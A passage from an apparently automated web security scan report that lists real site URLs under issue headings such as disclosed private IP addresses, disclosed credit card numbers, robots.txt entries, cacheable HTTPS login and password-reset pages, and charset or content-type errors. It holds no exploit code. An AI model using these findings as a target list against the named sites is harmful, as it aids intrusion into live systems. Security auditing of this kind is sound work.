26.123. http://www.msnbc.redacted/id/41330515/ns/us_news-life/

26.124. http://www.msnbc.redacted/id/41330876/ns/world_news-europe/

26.125. http://www.nasawatch.com/

26.126. http://www.newsvine.com/_vine/js/vs/master.xml

26.127. https://www.newsvine.com/_vine/js/msnbc/s_code.js

26.128. http://www.opensource.org/licenses/gpl-license.php

26.129. http://www.opensource.org/licenses/mit-license.php

26.130. http://www.polls.newsvine.com/_static/js/3523ed6c0a92179cbcf864e66c3b25d367f590e6.js

26.131. http://www.polls.newsvine.com/_static/js/4103fafbe30ce05a9b8143ffb6b508a6b758dee5.js

26.132. http://www.polls.newsvine.com/_static/js/4e7964f3c7b21be02021b7cd5cf1156e55bce9bf.js

26.133. http://www.polls.newsvine.com/_static/js/5e374218b458bef20a9b343255be99bcb1dc1c08.js

26.134. http://www.polls.newsvine.com/_static/js/6424485dfa93bc7ba9fe5d9f2e2924a193eab46a.js

26.135. http://www.polls.newsvine.com/_static/js/7d448396b677364eb4e464c0a6154d6668c89661.js

26.136. http://www.polls.newsvine.com/_static/js/db9ef5fdd5fb0a36c8e130839bd46dc2a81a597a.js

26.137. http://www.polls.newsvine.com/_vine/js/m1/common.js

26.138. http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js

26.139. http://www.polls.newsvine.com/education

26.140. http://www.polls.newsvine.com/world-news

26.141. http://www.popsci.com/

26.142. http://www.popsci.com/files/js/ee31ad0468d1381137041de39ea20f10.js

26.143. http://www.scientificamerican.com/blog/observations/

26.144. http://www.scientificamerican.com/errors/404.cfm

26.145. http://www.scout.com/3/privacy-policy.html

26.146. http://www.scout.com/3/terms-of-service.html

26.147. http://www.signonsandiego.com/news/blogs/science-quest/

26.148. http://www.silverlight.net/

26.149. http://www.silverlight.net/community/

26.150. http://www.silverlight.net/privacy.aspx

26.151. http://www.silverlight.net/resources/script/omniture/s_code_dotnet.min.js

26.152. http://www.silverlight.net/termsofuse.aspx

26.153. http://www.spacedaily.com/

26.154. http://www.spacepolitics.com/

26.155. http://www.thecaseforpluto.com/

26.156. http://www.tigerdirect.com/applications/SearchTools/item-details.asp

26.157. http://www.w3.org/TR/1999/REC-html401-19991224/strict.dtd

26.158. http://www.w3.org/TR/html4/strict.dtd

27. Private IP addresses disclosed

27.1. http://atl.whitepages.com//AFTRSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link/ATCI=1294100002-3786607

27.2. http://atl.whitepages.com/AFTRSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link

27.3. http://atl.whitepages.com/IMPCNT/ccid=58230/AAMSZ=top_rail/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS

27.4. http://atl.whitepages.com/IMPCNT/ccid=58255/AAMSZ=landscape_module/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS

27.5. http://atl.whitepages.com/IMPCNT/ccid=58284/AAMSZ=bottom_rail/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS

27.6. http://atl.whitepages.com/IMPCNT/ccid=60680/AAMSZ=med_rect/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS

27.7. http://atl.whitepages.com/LSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link

27.8. http://atl.whitepages.com/accipiter/adclick/CID=0000e5bbb2c762f700000000/AAMSZ=endemic_module/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/

27.9. http://atl.whitepages.com/accipiter/adclick/CID=fffffffcfffffffcfffffffc/AAMSZ=custom_panel/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/

27.10. http://atl.whitepages.com/accipiter/adclick/CID=fffffffcfffffffcfffffffc/AAMSZ=teaser_link/ATCI=1294100002-3786607/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/

27.11. http://atl.whitepages.com/adclick/CID=0000e376b2c762f700000000/relocate=/

27.12. http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=

27.13. http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=/

27.14. http://atl.whitepages.com/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link

27.15. http://college.scout.com/

27.16. http://collegebasketball.scout.com/

27.17. http://collegefootball.scout.com/

27.18. http://content.scout.com/a.z

27.19. http://digg.com/search

27.20. http://digg.com/search

27.21. http://digg.com/search

27.22. http://digg.com/search

27.23. http://jcfootball.scout.com/

27.24. http://mlb.scout.com/

27.25. http://msn.whitepages.com/static/common/endemic.js

27.26. http://news.discovery.com/

27.27. http://news.discovery.com/

27.28. http://preps.scout.com/

27.29. http://profootball.scout.com/

27.30. http://recruiting.scout.com/

27.31. http://recruiting.scout.com/a.z

27.32. http://recruiting.scout.com/a.z

27.33. http://recruiting.scout.com/a.z

27.34. http://recruiting.scout.com/a.z

27.35. http://recruiting.scout.com/a.z

27.36. http://rss.scout.com/rss.aspx

27.37. http://rss.scout.com/rss.aspx

27.38. http://scouthoops.scout.com/

27.39. https://secure.scout.com/a.z

27.40. https://secure.scout.com/a.z

27.41. https://secure.scout.com/a.z

27.42. https://secure.scout.com/a.z

27.43. http://stackoverflow.com/

27.44. http://stackoverflow.com/questions

27.45. http://www.msnbc.redacted/

27.46. http://www.msnbc.redacted/id/24780215/ns/technology_and_science-games

27.47. http://www.msnbc.redacted/id/3032072/ns/business

27.48. http://www.msnbc.redacted/id/3032076/ns/health

27.49. http://www.msnbc.redacted/id/3032118/ns/technology_and_science

27.50. http://www.msnbc.redacted/id/3032507/ns/world_news

27.51. http://www.msnbc.redacted/id/3032525/ns/us_news

27.52. http://www.msnbc.redacted/id/3032553/ns/politics

27.53. http://www.msnbc.redacted/id/3053415/

27.54. http://www.msnbc.redacted/id/8004316/

27.55. http://www.scout.com/

27.56. http://www.scout.com/3/college-links.html

27.57. http://www.scout.com/3/college-links.html

27.58. http://www.scout.com/3/company.html

27.59. http://www.scout.com/3/company.html

27.60. http://www.scout.com/3/fair-use.html

27.61. http://www.scout.com/3/fair-use.html

27.62. http://www.scout.com/3/jobs.html

27.63. http://www.scout.com/3/jobs.html

27.64. http://www.scout.com/3/privacy-policy.html

27.65. http://www.scout.com/3/privacy-policy.html

27.66. http://www.scout.com/3/recruiting-links.html

27.67. http://www.scout.com/3/recruiting-links.html

27.68. http://www.scout.com/3/security-information.html

27.69. http://www.scout.com/3/terms-of-service.html

27.70. http://www.scout.com/3/terms-of-service.html

27.71. http://www.scout.com/a.z

27.72. http://www.scout.com/a.z

27.73. http://www.scout.com/a.z

27.74. http://www.scout.com/a.z

27.75. http://www.scout.com/a.z

27.76. http://www.scout.com/search.aspx

27.77. http://www.scout.com/search.aspx

27.78. http://www.scout.com/search.aspx

27.79. http://www.scout.com/search.aspx

27.80. http://www.scout.com/widgets/

27.81. http://www.unica.com/

28. Credit card numbers disclosed

28.1. http://money.redacted/investing/stock-picks-to-change-your-life.aspx

28.2. http://www.bing.com/travel/content/search

28.3. http://www.bing.com/travel/content/search

29. Robots.txt file

29.1. http://ad.ae.doubleclick.net/adj/aljazeera_EN/middleeast

29.2. http://advertising.aol.com/privacy/advertisingcom/opt-out

29.3. http://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/assets/skins/sam/skin.css

29.4. http://alex-johnson.newsvine.com/

29.5. http://amch.questionmarket.com/adsc/d852149/4/864449/randm.js

29.6. http://articles.redacted/news/news.aspx

29.7. http://athima-chansanchai.newsvine.com/

29.8. http://atl.whitepages.com/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link

29.9. http://b.rad.redacted/ADSAdClient31.dll

29.10. http://b.voicefive.com/b

29.11. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90

29.12. http://bassistance.de/jquery-plugins/jquery-plugin-validation/

29.13. http://beta-ads.ace.advertising.com/

29.14. http://blog.deconcept.com/swfobject/

29.15. http://blogs.discovermagazine.com/badastronomy/

29.16. http://blogs.nature.com/news/thegreatbeyond/

29.17. http://bodyodd.msnbc.redacted/

29.18. http://boyle.newsvine.com/

29.19. http://calendar.live.com/calendar/calendar.aspx

29.20. http://careers.redacted/

29.21. http://cartoonblog.msnbc.redacted/

29.22. http://clients1.google.com/complete/search

29.23. http://cm.g.doubleclick.net/pixel

29.24. http://college.scout.com/

29.25. http://collegebasketball.scout.com/

29.26. http://collegefootball.scout.com/

29.27. http://curmudgeons.blogspot.com/

29.28. http://dateline.msnbc.com/

29.29. http://developer.yahoo.net/yui/license.txt

29.30. http://digitalnature.ro/projects/fusion

29.31. http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

29.32. http://earthsky.org/

29.33. http://ec.redcated/ds/UXULASONYSEL/

29.34. http://eurekalert.org/

29.35. http://hardball.msnbc.com/

29.36. http://helenaspopkin.newsvine.com/

29.37. http://ingame.msnbc.redacted/_news/2011/01/25/5916141-my-virtual-girlfriend-is-real-world-creepy

29.38. http://jcfootball.scout.com/

29.39. http://jp.video.redacted/

29.40. http://jquery.org/license

29.41. http://latino.video.redacted/

29.42. http://live.newsvine.com/

29.43. http://login.live.com/gls.srf

29.44. http://malexj.tk/6M

29.45. http://malexj.wordpress.com/

29.46. http://michaelwann.newsvine.com/

29.47. http://mlb.scout.com/

29.48. http://msnbc.com/

29.49. http://mtp.msnbc.com/

29.50. http://music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

29.51. http://nbcsports.msnbc.com/id/41325676/ns/sports-tennis/

29.52. http://netscape.aol.com/$|http:/music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

29.53. http://news.discovery.com/

29.54. http://news.sciencemag.org/scienceinsider/

29.55. http://nightly.msnbc.com/

29.56. http://ninemsn.video.redacted/

29.57. http://openchannel.msnbc.redacted/

29.58. http://p.ace.advertising.com/

29.59. http://pagead2.googlesyndication.com/pagead/expansion_embed.js

29.60. http://planetary.org/blog

29.61. http://preps.scout.com/

29.62. http://profootball.scout.com/

29.63. http://progolftalk.nbcsports.com/2011/01/29/tiger-woods-shoots-74-in-farmers-third-round/related

29.64. http://r1.ace.advertising.com/

29.65. http://rachel.msnbc.com/

29.66. http://redtape.msnbc.com/

29.67. http://redtape.newsvine.com/

29.68. http://rss.scout.com/rss.aspx

29.69. http://s0.2mdn.net/879366/flashwrite_1_2.js

29.70. http://safebrowsing.clients.google.com/safebrowsing/downloads

29.71. http://science.slashdot.org/

29.72. https://secure.scout.com/js/oo_engine.js

29.73. https://security.live.com/LoginStage.aspx

29.74. http://seedmagazine.com/

29.75. http://static.ak.fbcdn.net/connect/xd_proxy.php

29.76. http://suzanne-choney.newsvine.com/

29.77. http://technolog2.newsvine.com/

29.78. http://thelastword.msnbc.redacted/

29.79. http://today.msnbc.com/

29.80. http://toddkenreck.newsvine.com/

29.81. http://top.newsvine.com/users

29.82. http://trueslant.com/milesobrien/

29.83. http://tv.msnbc.com/

29.84. https://twitter.com/ToddKenreck

29.85. http://wbenedetti.newsvine.com/

29.86. http://webreflection.blogspot.com/2007/08/global-scope-evaluation-and-dom.html

29.87. http://widgets.digg.com/buttons.js

29.88. http://www.adobe.com/cfusion/knowledgebase/index.cfm

29.89. http://www.amazon.com/gp/product/1935182374

29.90. http://www.batstrading.com/

29.91. http://www.briefing.com/

29.92. http://www.dabagirls.com/|http:/www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|redacted/wonderwall|v14.redacted/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

29.93. http://www.dailygrail.com/

29.94. http://www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|redacted/wonderwall|v14.redacted/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

29.95. http://www.fashioncocktail.com/|http:/theorganicbeautyexpert.typepad.com|http:/thesmartstylist.com|http:/www.dabagirls.com/|http:/www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|redacted/wonderwall|v14.redacted/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

29.96. http://www.ftc.gov/ogc/coppa1.htm

29.97. http://www.googleadservices.com/pagead/conversion.js

29.98. http://www.habitablezone.com/space/

29.99. http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml

29.100. http://www.interactivedata-rts.com/

29.101. http://www.live.com/

29.102. http://www.livescience.com/

29.103. http://www.morningstar.com/

29.104. http://www.msnbc.com/

29.105. http://www.nasaspaceflight.com/

29.106. https://www.newsvine.com/_nv/api/accounts/login

29.107. http://www.outofthecradle.net/

29.108. http://www.pcmag.com/category2/0,2806,24,00.asp|http:/www.pcmag.com/category2/0,2806,9,00.asp|http:/www.pcmag.com/category2/0,2806,4829,00.asp|http:/www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http:/www.terra.com.mx/default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

29.109. http://www.polls.newsvine.com/_vine/js/pierre

29.110. http://www.popsci.com/

29.111. http://www.popularmechanics.com/

29.112. http://www.reuters.com/

29.113. http://www.scidev.net/

29.114. http://www.scienceblog.com/cms/index.php

29.115. http://www.scientificamerican.com/blog/observations/

29.116. http://www.scout.com/webproxy.ashx

29.117. http://www.signonsandiego.com/news/blogs/science-quest/

29.118. http://www.six-telekurs.com/tkfich_index/tkfich_home.htm

29.119. http://www.spacedaily.com/

29.120. http://www.spacepolitics.com/

29.121. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|redacted/wonderwall|v14.redacted/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

29.122. http://www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

29.123. http://www.terra.com.mx/default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

29.124. http://www.theshophound.typepad.com/|http:/www.chicgalleria.com|http:/lastylistmom.com|http:/www.chicgirlstyle.com|http:/blog.sofiawean.com|http:/www.themakeupblogger.com|http:/www.fashioncocktail.com/|http:/theorganicbeautyexpert.typepad.com|http:/thesmartstylist.com|http:/www.dabagirls.com/|http:/www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|redacted/wonderwall|v14.redacted/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

29.125. http://www.ticketcity.com/

29.126. http://www.tigerdirect.com/applications/SearchTools/item-details.asp

29.127. http://www.twitter.com/MAlexJohnson

29.128. http://www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

29.129. http://www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

29.130. http://www.webmd.com/$|wonderwall.redacted|redacted/wonderwall|v14.redacted/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

30. Cacheable HTTPS response

30.1. https://login.silverlight.net/login/createuser.aspx

30.2. https://login.silverlight.net/login/forgotpassword.aspx

30.3. https://secure.opinionlab.com/ccc01/comment_card.asp

30.4. https://secure.opinionlab.com/ccc01/o.asp

30.5. https://www.google.com/adsense/support/bin/request.py

30.6. https://www.newsvine.com/_action/user/logout

30.7. https://www.newsvine.com/_nv/accounts/global/information

30.8. https://www.newsvine.com/_nv/accounts/login

30.9. https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts

30.10. https://www.newsvine.com/_nv/accounts/msnbc/newsletters

30.11. https://www.newsvine.com/_nv/accounts/register

30.12. https://www.newsvine.com/_nv/api/accounts/login

30.13. https://www.newsvine.com/_nv/api/accounts/resetPassword

31. Multiple content types specified

32. HTML does not specify charset

32.1. http://ad.doubleclick.net/adi/

32.2. http://ad.doubleclick.net/adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6

32.3. http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.3

32.4. http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.5

32.5. http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8

32.6. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7

32.7. http://ad.doubleclick.net/adi/N3973.MSN/B4412732.159

32.8. http://ad.doubleclick.net/adi/N4319.MSNMEN/B3889285.6

32.9. http://ad.doubleclick.net/adi/N4319.msn/B2087123.383

32.10. http://ad.doubleclick.net/adi/N4441.microsoftonline/B5073082

32.11. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903

32.12. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4

32.13. http://ad.doubleclick.net/adi/tigerdirect.com/Section_2_House

32.14. http://ad.doubleclick.net/clk

32.15. http://amch.questionmarket.com/adsc/d775684/10/38973908/decide.php

32.16. http://amch.questionmarket.com/adscgen/st.php

32.17. http://analytics.live.com/Sync.html

32.18. http://analytics.microsoft.com/Sync.html

32.19. http://analytics.redacted/Include.html

32.20. http://analytics.redacted/sync.html

32.21. http://bs.serving-sys.com/BurstingPipe/adServer.bs

32.22. http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68

32.23. http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F

32.24. http://context3.kanoodle.com/cgi-bin/context.cgi

32.25. http://dm.de.mookie1.com/2/B3DM/2010DM/1860849269@x23

32.26. http://ec.redcated/ds/UXULASONYSEL/

32.27. http://english.aljazeera.net/_inc/adsrc.html

32.28. http://english.aljazeera.net/news/middleeast/2011/01/201113085252994161.html

32.29. http://geo.eyewonder.com/

32.30. http://jqueryui.com/about

32.31. http://local.redacted/ten-day.aspx

32.32. http://local.redacted/weather.aspx

32.33. http://redacted/inc/Attributions.asp

32.34. http://redacted/inc/Views/Shared/Core/Content/js/utility.js

32.35. http://redacted/investor/StockRating/srsmain.asp

32.36. http://redacted/investor/home.aspx

32.37. http://redacted/investor/market/earncalendar/

32.38. http://redacted/investor/market/treasuries.aspx

32.39. http://redacted/investor/partsub/funds/etfperformancetracker.aspx

32.40. http://redacted/investor/partsub/funds/topfunds.asp

32.41. http://redacted/investor/quotewatchlist.asp

32.42. http://msn.whitepages.com/

32.43. http://mymsn.hotmail.redacted/cgi-bin/mymsn/mymsn.html

32.44. http://player.ooyala.com/info/primary/

32.45. http://spe.redcated/ds/CJCNTCINGCIN/

32.46. http://spe.redcated/ds/CJCNTCINGCP9/

32.47. http://spe.redcated/ds/DEDENBARCISA/

32.48. http://sstatic.net/Js/third-party/jquery.typewatch.js

32.49. http://sstatic.net/Js/third-party/openid-jquery.js

32.50. http://sstatic.net/Js/wmd.js

32.51. http://sstatic.net/js/master.min.js

32.52. http://sstatic.net/js/question.js

32.53. http://sstatic.net/openid.css

32.54. http://sstatic.net/stackoverflow/all.css

32.55. http://sstatic.net/stackoverflow/img/favicon.ico

32.56. http://stackoverflow.com/posts/4843433/ivc/3344

32.57. http://stackoverflow.com/questions

32.58. http://stackoverflow.com/questions/4843433/php-facebook-like-box-being-able-to-like-the-current-page-using-dynamic-url

32.59. http://stackoverflow.com/tags

32.60. http://stackoverflow.com/users

32.61. http://stackoverflow.com/users/login

32.62. http://stackoverflow.com/users/login/global/request

32.63. http://svtrk.com/vtrk/

32.64. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/view.pxl

32.65. http://uac.advertising.com/wrapper/aceUACping.htm

32.66. http://redcated/APM/iview/139941180/direct

32.67. http://redcated/APM/iview/148848786/direct

32.68. http://redcated/BEL/iview/262582811/direct

32.69. http://redcated/CNT/iview/286609711/direct

32.70. http://redcated/CNT/iview/287065754/direct

32.71. http://redcated/CNT/iview/299297287/direct

32.72. http://redcated/NYC/iview/264935949/direct

32.73. http://redcated/ULA/iview/296652509/direct

32.74. http://vms.redacted/vms.aspx

32.75. http://webmail.aol.com/$|http:/travel.aol.com/$|http:/netscape.aol.com/$|http:/music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

32.76. http://wrapper.g.redacted/GRedirect.aspx

32.77. http://www.cannex.com/

32.78. http://www.co2stats.com/propres.php

32.79. http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml

32.80. http://www.iaventurepartners.com/InformationArbitrage/bcode.swf

32.81. http://www.iaventurepartners.com/LKKpQ/InformationArbitrage/bcode.swf

32.82. http://www.json.org/js.html

32.83. http://www.json.org/json2.js

32.84. http://www.microsoft.com/library/errorpages/searchMetric.html

32.85. http://www.msnbc.redacted/html/HtmlSitemap0.html

32.86. http://www.spacedaily.com/

32.87. http://www.thespacereview.com/

32.88. http://www.tigerdirect.com/cgi-bin/icart.asp

32.89. http://www.webmd.com/$|wonderwall.redacted|redacted/wonderwall|v14.redacted/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

33. HTML uses unrecognised charset

33.1. http://ccc01.opinionlab.com/o.asp

33.2. https://secure.opinionlab.com/ccc01/comment_card.asp

33.3. https://secure.opinionlab.com/ccc01/o.asp

34. Content type incorrectly stated

34.1. http://ad.doubleclick.net/clk

34.2. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296350884**

34.3. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/Insert_Random_Number

34.4. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137

34.5. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426**

34.6. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449**

34.7. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296410362**

34.8. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1478181591

34.9. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473

34.10. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**

34.11. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**

34.12. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206**

34.13. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125

34.14. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894

34.15. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147

34.16. http://ak.c.ooyala.com/d0MGgwMjrtm0rSeX9bTc29IpE0zQQ1Rj/hsDN-m_bJJsXh8PiFhxJgLZO7aYuQRy7

34.17. http://amch.questionmarket.com/adsc/d775684/10/38973908/decide.php

34.18. http://amch.questionmarket.com/adscgen/st.php

34.19. http://api.bit.ly/shorten

34.20. http://ar.voicefive.com/b/rc.pli

34.21. http://b.rad.redacted/ADSAdClient31.dll

34.22. http://bs.serving-sys.com/BurstingPipe/adServer.bs

34.23. http://cartoonblog.msnbc.redacted/_vine/printer

34.24. http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68

34.25. http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F

34.26. http://context3.kanoodle.com/cgi-bin/context.cgi

34.27. http://engine2.adzerk.net/z/8277/adzerk1_2_4_43,adzerk2_2_17_45

34.28. http://engine2.adzerk.net/z/8277/adzerk2_2_17_45

34.29. http://english.aljazeera.net/Media/ver2/Images/1pximage.png

34.30. http://english.aljazeera.net/Services/IncludePart/

34.31. http://english.aljazeera.net/Services/IncludePart/LevelOne/

34.32. http://geo.eyewonder.com/

34.33. http://i1.silverlight.net/avatar/anonymous.jpg

34.34. http://i3.silverlight.net/avatar/anonymous.jpg

34.35. http://info.ooyala.com/info/secondary/

34.36. http://investing.money.redacted/mv/MarketStatus

34.37. http://investing.money.redacted/mv/MarketStatus/

34.38. http://investing.money.redacted/mv/RecentQuotes/

34.39. http://javadl-esd.sun.com/update/AU/map-2.0.2.4.xml

34.40. http://lib.newsvine.com/chrome/photoblog/images/footer.jpg

34.41. http://lib.newsvine.com/chrome/thelastword/images/promo_videoplayer.gif

34.42. http://local.redacted/ten-day.aspx

34.43. http://local.redacted/weather.aspx

34.44. http://redacted/inc/Views/Shared/Core/Content/js/utility.js

34.45. http://redacted/investor/StockRating/srsmain.asp

34.46. http://redacted/investor/home.aspx

34.47. http://redacted/investor/market/earncalendar/

34.48. http://redacted/investor/market/treasuries.aspx

34.49. http://redacted/investor/partsub/funds/etfperformancetracker.aspx

34.50. http://msnbcmedia.redacted/j/ap/gays

34.51. http://msnbcmedia.redacted/j/ap/missing

34.52. http://msnbcmedia.redacted/j/ap/nannies

34.53. http://msnbcmedia.redacted/j/ap/super

34.54. http://msnbcmedia.redacted/j/ap/switzerland

34.55. http://msnbcmedia.redacted/j/ap/tampa

34.56. http://offers.lendingtree.com/splitter/splitter.ashx

34.57. http://oneightyla.vo.llnwd.net/o37/live/sony/2010_11_04_BLOGGIE/video/TubeFailWin-160x90.flv

34.58. http://openchannel.msnbc.redacted/_vine/printer

34.59. http://photoblog.msnbc.redacted/_vine/printer

34.60. http://player.ooyala.com/info/primary/

34.61. http://rad.redacted/ADSAdClient31.dll

34.62. http://sas.ooyala.com/authorized

34.63. http://sas.ooyala.com/crossdomain.xml

34.64. http://services.money.redacted/QuoteService/dynamic

34.65. http://services.money.redacted/quoteservice/streaming

34.66. http://static.pulse360.com/blob/3a/2bd5ab3_7821_mimg.jpg

